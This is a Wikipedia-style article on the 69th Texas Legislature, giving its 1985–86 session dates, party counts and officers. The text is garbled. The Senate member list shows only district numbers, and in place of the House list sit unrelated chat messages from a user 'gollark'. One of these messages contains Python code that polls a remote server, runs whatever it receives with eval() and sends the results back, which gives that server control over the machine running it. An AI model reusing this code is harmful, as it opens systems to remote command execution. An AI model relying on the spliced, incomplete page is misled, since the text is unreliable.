Sixty-ninth Texas Legislature
The 69th Texas Legislature met in regular session from January 8, 1985, to May 27, 1985, and in three subsequent special called sessions (see below). All members present during this session were elected in the 1984 general elections.
Sessions
Regular Session: January 8, 1985 - May 27, 1985
1st Called Session: May 28, 1985 - May 30, 1985
2nd Called Session: August 6, 1986 - September 4, 1986
3rd Called Session: September 8, 1986 - September 30, 1986
Party summary
Senate
Affiliation | Members | Note | |
---|---|---|---|
Democratic Party | 25 | ||
Republican Party | 6 | ||
Total | 31 |
House
Affiliation | Members | Note | |
---|---|---|---|
Democratic Party | 95 | ||
Republican Party | 55 | ||
Total | 150 |
Officers
Senate
- Lieutenant Governor: William P. Hobby, Jr., Democrat
- President Pro Tempore (regular session): Ray Farabee, Democrat
- President Pro Tempore (1st called session): Carlos Truan, Democrat
- President Pro Tempore (2nd called session): Carlos Truan, Democrat
- President Pro Tempore (3rd called session): Carlos Truan, Democrat
House
- Speaker of the House: Gibson D. "Gib" Lewis, Democrat
Members
Senate
Dist. 1
Dist. 2
Dist. 3
Dist. 4
Dist. 5
Dist. 6
Dist. 7
Dist. 8
Dist. 9
Dist. 10
|
Dist. 11
Dist. 12
Dist. 13
Dist. 14
Dist. 15
Dist. 16
Dist. 17
Dist. 18
Dist. 19
Dist. 20
|
Dist. 21
Dist. 22
Dist. 23
Dist. 24
Dist. 25
Dist. 26
Dist. 27
Dist. 28
Dist. 29
Dist. 30
Dist. 31
|
House
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
gollark: You mean SPUDNET? I think I may have broken that URL in the osmarks.net migration. Use spudnet.osmarks.net.
External links
- Texas Legislature Online
- Texas Senate
- Texas House of Representatives
- Election Results from the Office of the Secretary of State
- Legislative Reference Library
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.